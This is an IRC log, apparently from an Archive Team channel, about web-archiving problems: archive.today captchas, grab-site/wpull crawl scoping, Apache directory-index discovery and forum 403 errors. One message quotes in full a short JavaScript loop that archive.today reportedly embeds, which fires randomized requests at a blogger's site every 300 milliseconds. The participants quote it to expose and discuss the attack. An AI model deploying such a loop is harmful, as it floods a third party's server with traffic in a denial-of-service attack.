00:00:02sec^nd quits [Remote host closed the connection]
00:00:28sec^nd (second) joins
00:02:52Sk1d joins
00:04:46Dada quits [Remote host closed the connection]
00:10:51BornOn420 quits [Ping timeout: 272 seconds]
00:12:47fangfufu quits [Quit: ZNC 1.9.1+deb2+b3 - https://znc.in]
00:13:18fangfufu joins
00:14:02sec^nd quits [Remote host closed the connection]
00:14:20sec^nd (second) joins
00:18:17etnguyen03 (etnguyen03) joins
00:42:20hamouda9 quits [Client Quit]
00:49:05Sk1d quits [Read error: Connection reset by peer]
00:49:06etnguyen03 quits [Remote host closed the connection]
00:55:02useretail quits [Remote host closed the connection]
00:55:41etnguyen03 (etnguyen03) joins
00:57:52useretail joins
00:57:57BornOn420 (BornOn420) joins
01:18:05<pabs>klea: re Moin, hackily with AB, or someone could write some code to generate an !ao list https://wiki.archiveteam.org/index.php/MoinMoin#ArchiveBot
01:32:13<pabs>justauser: e164.arpa results https://transfer.archivete.am/8iNc3/e164.arpa-pabs-scrape.txt
01:32:13<eggdrop>inline (for browser viewing): https://transfer.archivete.am/inline/8iNc3/e164.arpa-pabs-scrape.txt
01:35:42<klea>aaa, pita
01:36:12<@JAA>I have a partial implementation of scripts to make it easier, need to finish those.
01:36:16<@JAA>Also, #wikiteam
01:37:48<pabs>justauser: re archive.today, do we know what triggers the captchas?
01:39:41<Yakov>happens every time when trying to save a capture with no cookies/new session
01:40:32<Yakov>sometimes happens when searching or when going to a capture
01:42:04<pabs>huh, it does now. I remember not having captchas when saving before
01:43:12<Yakov>pretty sure it always did, just if you solved it in the past (whether it be from going to a capture or even viewing a capture previously) it might not show
01:43:44<pabs>hmm
01:45:09<Yakov>anyways they're well aware people know about the DDoS script yet they still keep it, in fact they've mutated the DDoS script since the HN post to now use Math.random instead of Date().getTime()
01:45:41<Yakov>https://news.ycombinator.com/item?id=46624740 <-- previous script, current script: setInterval(function(){fetch("https://gyrovague.com/?s="+Math.random().toString(36).substring(2,3+Math.random()*8),{ referrerPolicy:"no-referrer",mode:"no-cors" });},300);
01:47:21<pokechu22>hmm, I didn't see the script or any network traffic when I looked for it yesterday; maybe they removed it temporarily?
01:48:54<Yakov>i noticed that too, but the script was still in the html. then i realized ublock and most adblockers now block it, as mentioned in the recent gyrovague blog post
01:49:29<Yakov>https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/ ctrl+f "ublock"
01:50:32<pokechu22>I saw that but assumed it would still show up in the developer console (as blocked). I *think* I also looked in the HTML and didn't see the script, but might have just missed it
01:51:07<Yakov>I always assumed it would be blocked and i'm confused as well however i only glimpsed over it but i know it was definitely there
01:51:13<Yakov>s/always/also/
01:52:33<Yakov>ublock might not be doing it (just) on a network level? Chromium with 0 extensions and the requests actually do go through and show up
01:55:51<Yakov>https://pastebin.com/X2aW7J1G this is the html for the captcha page for anyone who is curious (only thing i changed was i redacted my IP that was in an html comment from the server)
01:55:53<@JAA>I don't remember *not* seeing a captcha on URL submission (without a recent previous submission).
02:08:02<steering>Yakov: pastebin hid your paste
02:08:05<steering>pastebin--
02:08:07<eggdrop>[karma] 'pastebin' now has -1 karma!
02:08:24<Yakov>"Pending Moderation" that happened fast
02:08:31<steering>doxx and malware: yes
02:08:33<steering>html dump: no
02:09:07<Yakov>alternative: https://transfer.archivete.am/64GbF/archive.today%20challenge%20html.html
02:09:07<eggdrop>inline (for browser viewing): https://transfer.archivete.am/inline/64GbF/archive.today%20challenge%20html.html
02:10:07<Yakov>wait inline is actually running the html
02:10:16<steering>yeah it does that
02:10:29<Yakov>i was really concerned for a second when i noticed a fake cloudflare challenge
02:10:47<Yakov>lol and it's doin the requests https://img.yakov.cloud/gXuKY.png
02:12:07<steering>yeah i was confused by view source not working
02:12:11<steering> window.history.pushState('/', '', '/');
02:12:21steering shakes fist at browsers for allowing that to break view source
02:12:37<steering>(or just for allowing it at all, ugh)
02:15:16<steering>https://transfer.archivete.am/inline/bctfb/archive.today.challenge.html uploaded as text/plain
02:15:39steering shakes fist at transfer for not including a newline on the end of the output
02:20:39<steering>aaaaaaah I wish e164 was a thing
02:26:59<pabs>!tell egallager re that wesnoth forums post, there are a few non-404 .sf2 files on IA, found using the little-things ia-cdx-search tool https://transfer.archivete.am/cqUq9/www.freesf2.com-non-404-sf2-files.txt
02:26:59<eggdrop>[tell] ok, I'll tell egallager when they join next
02:28:32<Yakov>i really wish we could recursively archive https://www.mobileread.com/ forums, if someone can figure it out that would be great
02:29:09<Yakov>somehow AB got 403s on forumdisplay.php but works fine in browser? 🤷‍♂️
02:35:12<pabs>hmm, wget with no UA doesn't get a 403
02:37:39<Yakov>it was last done on job id 15ypiav9wiw4v40ktcxoy8dhk
02:38:07<Yakov>20:58:04 <@pokechu22> https://www.mobileread.com/forums/member.php is restricted, but it also got 403s on forumdisplay.php
02:38:39<Yakov>s/done/queued and aborted/
02:39:13<pabs>might be IP reputation, I got 200 regardless of UA with curl, using all the AB UAs
02:39:26<Yakov>We can try again then
03:28:41michaelblob quits [Quit: yoop]
03:29:20michaelblob joins
04:02:48etnguyen03 quits [Quit: Konversation terminated!]
04:03:23etnguyen03 (etnguyen03) joins
04:15:54etnguyen03 quits [Remote host closed the connection]
04:19:30<pokechu22>OK, yeah, I can confirm archive.today still does that, and the history modification probably is part of the problem. The way archive.today handles failed jobs is annoying in general - it makes it easy to forget what the original URL was
04:19:47<pokechu22>and it doesn't show up in f12 at all
04:26:42chunkynutz60 quits [Quit: The Lounge - https://thelounge.chat]
04:26:55chunkynutz60 joins
04:45:23Kotomind joins
04:52:58DogsRNice quits [Read error: Connection reset by peer]
04:53:57sec^nd quits [Remote host closed the connection]
04:54:30sec^nd (second) joins
05:03:27SootBector quits [Remote host closed the connection]
05:04:26SootBector (SootBector) joins
05:04:46n9nes quits [Ping timeout: 256 seconds]
05:05:13n9nes joins
05:58:31Island quits [Read error: Connection reset by peer]
06:03:37chunkynutz60 quits [Ping timeout: 272 seconds]
06:09:05nexussfan quits [Quit: Konversation terminated!]
06:22:28ArchivalEfforts quits [Quit: https://quassel-irc.org - Chat comfortably. Anywhere.]
06:23:39ArchivalEfforts joins
06:34:35Sluggs quits [Excess Flood]
06:39:35chunkynutz60 joins
06:39:44Sluggs (Sluggs) joins
06:43:14Guest quits [Read error: Connection reset by peer]
06:43:16Guest joins
06:43:22midou quits [Ping timeout: 256 seconds]
06:50:14barry quits [Remote host closed the connection]
06:50:50barry joins
06:51:32sec^nd quits [Remote host closed the connection]
06:52:02sec^nd (second) joins
07:16:08flotwig quits [Read error: Connection reset by peer]
07:16:21flotwig joins
07:24:04sec^nd quits [Ping timeout: 256 seconds]
07:27:58sec^nd (second) joins
07:36:18Washuu quits [Quit: Ooops, wrong browser tab.]
08:35:09sec^nd quits [Remote host closed the connection]
08:35:35sec^nd (second) joins
09:34:31nathang2184 quits [Ping timeout: 272 seconds]
09:38:49midou joins
09:40:43nathang2184 joins
09:45:21twiswist_ quits [Read error: Connection reset by peer]
09:45:35twiswist_ (twiswist) joins
10:21:15oxtyped quits [Read error: Connection reset by peer]
10:28:20oxtyped joins
10:29:32<triplecamera|m>I've been tinkering with grab-site these days. I'd like to archive <https://pdos.csail.mit.edu/6.828/{2003..2025}/>, which is served by Apache.
10:30:50<triplecamera|m>Apache has a feature: When you access a directory without the index file, Apache lists all files under that directory. This enables the discovery of hidden files (files without links pointing to them).
10:32:17<triplecamera|m>I hope that whenever wpull visits a page, it automatically pushes its parent directory into the queue. Is this possible to achieve?
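The parent-directory idea above can be sketched in plain Python. `parent_dirs` is a hypothetical helper, not a wpull API; actually feeding its output back into the crawl queue would take a custom wpull plugin/hook script.

```python
# Hypothetical helper: derive every ancestor directory URL of a fetched page,
# so Apache "Index of" listings could be queued alongside the page itself.
from urllib.parse import urlsplit, urlunsplit

def parent_dirs(url):
    """Yield each ancestor directory URL of `url`, nearest first."""
    scheme, netloc, path, _, _ = urlsplit(url)
    # Drop the filename (or trailing slash) and walk up one level at a time.
    parts = path.rstrip("/").split("/")[:-1]
    while parts:
        yield urlunsplit((scheme, netloc, "/".join(parts) + "/", "", ""))
        parts.pop()

for u in parent_dirs("https://pdos.csail.mit.edu/6.828/2025/labs/lab1.html"):
    print(u)
```

Every directory yielded here is one an Apache server would render as an "Index of" page when no index file is present.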
11:09:08oxtyped quits [Ping timeout: 256 seconds]
11:37:00ichdasich quits [Remote host closed the connection]
11:40:26oxtyped joins
12:00:03Bleo182600722719623455222 quits [Quit: The Lounge - https://thelounge.chat]
12:02:52Bleo182600722719623455222 joins
12:10:53APOLLO03 quits [Quit: .]
12:13:11APOLLO03 joins
12:18:23Washuu joins
12:24:31Dada joins
13:00:23marcmarcos joins
13:09:45<justauser>pabs: I think everything interesting is on our wiki. Always on save, "bad" IPs get it on the first request, lasts for 5 minutes.
13:09:46<justauser>triplecamera|m: grab-site/AB won't climb up the directories on their own; this had to be implemented separately during the SFDW project.
13:18:20Arcorann__ quits [Ping timeout: 256 seconds]
13:24:25marcmarcos quits [Ping timeout: 272 seconds]
13:30:32<cruller>You can climb the directories by executing `grab-site --which-wpull-command` and removing `--no-parent` from the output. However, I don't think this is what triplecamera wants to do.
13:32:10PC quits [Remote host closed the connection]
13:32:23PC (PC) joins
13:40:58<cruller>Moreover, with this method, all URLs sharing the same FQDN as the seeds end up within the scope, IIUC.
13:44:54<masterx244|m>i wonder if an ignore could be abused to ignore anything that is not under the /6.828 top-level folder
13:45:40<cruller>--hostnames or similar option restricts the scope, but this also affects requisites.
13:48:18<masterx244|m>5 regexes should be enough to exclude anything outside of the folder. .edu/[^6] .edu/6[^.] .edu/6.[^8] and so on until where the urls divert
13:48:50<masterx244|m>requisites need a run through the database on ignored urls and then a --1 to fetch them without recursion
13:49:10<justauser>grab-site doesn't keep a DB of ignored URLs IIRC.
13:49:32<masterx244|m>it does :P, it's inside the wpull database
13:50:03<masterx244|m>i abused that back during the imgur hunting: crawl the site with an ignore matching everything except the target domain, afterwards dump the wpull db to a urllist and then grep
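The character-class trick from above can be sanity-checked with plain regexes. The pattern list and the `out_of_scope` helper below are just for the demo (grab-site's actual ignore handling is its own machinery), with one extra `[^/]` pattern appended to also catch siblings like /6.828x/.

```python
import re

# One pattern per position where a URL can diverge from the /6.828/ prefix;
# anything matching any of these would be ignored (out of scope).
ignores = [
    r"\.edu/[^6]",
    r"\.edu/6[^.]",
    r"\.edu/6\.[^8]",
    r"\.edu/6\.8[^2]",
    r"\.edu/6\.82[^8]",
    r"\.edu/6\.828[^/]",  # extra: catches /6.828x/-style siblings
]

def out_of_scope(url):
    """True if any ignore pattern matches, i.e. the URL leaves /6.828/."""
    return any(re.search(p, url) for p in ignores)

print(out_of_scope("https://pdos.csail.mit.edu/6.828/2025/labs/"))  # in scope
print(out_of_scope("https://pdos.csail.mit.edu/archive/"))          # ignored
```

Note the literal dots have to be escaped (`6\.828`); the unescaped `.` in the chat shorthand would match any character.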
13:58:23marcmarcos joins
14:01:36<marcmarcos>exit
14:01:44marcmarcos quits [Client Quit]
14:16:59lukash984 quits [Ping timeout: 272 seconds]
14:28:01<cruller>In any case, unless "Index of" pages are linked from regular pages, it's difficult to automatically push them into the queue, right?
14:29:56lukash984 joins
14:30:08<justauser>Not that hard, but needs a custom script. SFDW had one.
14:30:33<cruller>You might be able to do it using `--plugin-script`. But rather than that, I think it's easier to manually create a URL list from a 1st crawl and then perform a 2nd crawl.
14:30:54<cruller>ah yes, custom script.
14:36:24<cruller>BTW, in general, URLs that are in-scope but require out-of-scope resources for discovery are very troublesome.
14:38:57Island joins
14:42:28<cruller>I have no choice but to give up on orphan urls, but it's frustrating to miss urls that could be found depending on crawling rules.
14:48:01oxtyped quits [Ping timeout: 272 seconds]
14:51:11Kotomind quits [Ping timeout: 272 seconds]
14:56:33<h2ibot>Justauser edited Uncyclopedia (+621, Added dump links): https://wiki.archiveteam.org/?diff=60413&oldid=59310
14:57:58oxtyped joins
14:58:52<masterx244|m>koichi: like said: 2-stage crawl: first one to get all folders that are known, then pulling the folder indexes, then processing the indexes to check if there are more URLs hidden
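The "process the indexes" step of that 2-stage crawl can be sketched with the stdlib: parse a fetched Apache "Index of" page and keep the entry links, dropping the `?C=` column-sort links and the parent-directory link. `IndexParser` and `index_entries` are illustrative names, not part of grab-site or wpull.

```python
# Hedged sketch: extract entry URLs from an Apache directory-listing page.
from html.parser import HTMLParser
from urllib.parse import urljoin

class IndexParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href", "")
            # Skip the "?C=N;O=D"-style sort headers and the parent link.
            if href and not href.startswith("?") and href != "../":
                self.hrefs.append(href)

def index_entries(base_url, html):
    """Return absolute URLs for every file/subdirectory entry in a listing."""
    parser = IndexParser()
    parser.feed(html)
    return [urljoin(base_url, h) for h in parser.hrefs]

page = ('<html><body><h1>Index of /6.828/2025</h1><pre>'
        '<a href="?C=N;O=D">Name</a> <a href="../">Parent Directory</a> '
        '<a href="labs/">labs/</a> <a href="notes.pdf">notes.pdf</a>'
        '</pre></body></html>')
print(index_entries("https://pdos.csail.mit.edu/6.828/2025/", page))
```

Entries ending in `/` are subdirectories whose own indexes the second stage would fetch next; the rest are files, including any "hidden" ones with no inbound links.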
15:00:42<jodizzle>"Washington Post to make ‘significant’ cuts": https://www.semafor.com/article/02/04/2026/washington-post-to-make-significant-cuts
15:01:22<jodizzle>I imagine the Washington Post is thoroughly archived in several places, but just FYI.
15:19:54petrichor quits [Quit: ZNC 1.10.1 - https://znc.in]
15:41:18DogsRNice joins
16:05:38<pabs>pokechu22: re failed archive.today jobs, I found today that in firefox at least, hovering over the tab gives you a truncated original URL, and typing that into the URL bar gets you the full URL from history
16:06:50Ryz2 quits [Quit: Ping timeout (120 seconds)]
16:07:01Ryz2 (Ryz) joins
16:07:39<pabs>jodizzle: I think WaPo is pretty hard to archive, ISTR AB gets errors
16:10:39petrichor (petrichor) joins
16:38:15Guest58 quits [Quit: Textual IRC Client: www.textualapp.com]
16:45:57Washuu quits [Quit: Ooops, wrong browser tab.]
17:40:42crullerIRC quits [Ping timeout: 256 seconds]
17:41:56crullerIRC joins
17:46:48cyanbox_ joins
17:47:14cyanbox_ quits [Read error: Connection reset by peer]
17:49:47cyanbox quits [Ping timeout: 272 seconds]
17:57:31Juest quits [Read error: Connection reset by peer]
18:00:56Juest (Juest) joins
18:17:59<h2ibot>Manu edited Distributed recursive crawls (+69, Candidates: Add www.defence.go.ug): https://wiki.archiveteam.org/?diff=60414&oldid=60181
18:27:08michaelblob quits [Quit: yoop]
18:30:12michaelblob joins
18:32:36Sk1d joins
18:39:44nine quits [Quit: See ya!]
18:39:57nine joins
18:39:57nine quits [Changing host]
18:39:57nine (nine) joins
18:43:03<h2ibot>Manu edited Discourse/archived (+89, Queued https://chiahpa.be/): https://wiki.archiveteam.org/?diff=60415&oldid=60387
18:44:03<h2ibot>Manu edited Discourse/archived (+103, pokechu22 queued discussions.scouting.org): https://wiki.archiveteam.org/?diff=60416&oldid=60415
18:46:03<h2ibot>Manu edited Discourse/archived (+96, Queued discuss.ipfs.tech): https://wiki.archiveteam.org/?diff=60417&oldid=60416
18:49:04<h2ibot>Manu edited Discourse/archived (+100, Queued forums.rockylinux.org): https://wiki.archiveteam.org/?diff=60418&oldid=60417
18:51:04<h2ibot>Manu edited Discourse/archived (+89, Queued ziggit.dev): https://wiki.archiveteam.org/?diff=60419&oldid=60418
18:53:45Kabaya quits [Ping timeout: 272 seconds]
19:01:59Sk1d quits [Ping timeout: 272 seconds]
19:12:10iPwnedYourIOTSmartdog quits [Quit: Ping timeout (120 seconds)]
19:12:30iPwnedYourIOTSmartdog joins
19:51:21Wohlstand (Wohlstand) joins
19:59:52Wohlstand quits [Client Quit]
20:13:24ThreeHM quits [Quit: WeeChat 4.8.0]
20:14:31ThreeHM (ThreeHeadedMonkey) joins
20:17:40fetcher quits [Ping timeout: 256 seconds]
20:23:06fetcher joins
20:39:41lukash984 quits [Quit: The Lounge - https://thelounge.chat]
20:41:14lukash984 joins
21:35:00Sk1d joins
21:42:13fetcher quits [Ping timeout: 272 seconds]
21:43:38fetcher joins
22:01:22fetcher quits [Ping timeout: 256 seconds]
22:06:42fetcher joins
22:17:32flotwig quits [Quit: ZNC - http://znc.in]
22:19:43flotwig joins
22:21:29fetcher quits [Ping timeout: 272 seconds]
22:23:10fetcher joins
22:30:22Arcorann__ joins
22:38:41flotwig quits [Client Quit]
22:48:43n9nes quits [Ping timeout: 272 seconds]
22:49:50n9nes joins
22:58:02flotwig joins
23:01:51flotwig quits [Client Quit]
23:02:09Dada quits [Remote host closed the connection]
23:08:06flotwig joins
23:11:51flotwig quits [Client Quit]
23:15:34flotwig joins
23:16:32nexussfan (nexussfan) joins
23:38:25Arcorann__ quits [Read error: Connection reset by peer]
23:39:28Arcorann joins
23:49:02Sk1d quits [Ping timeout: 256 seconds]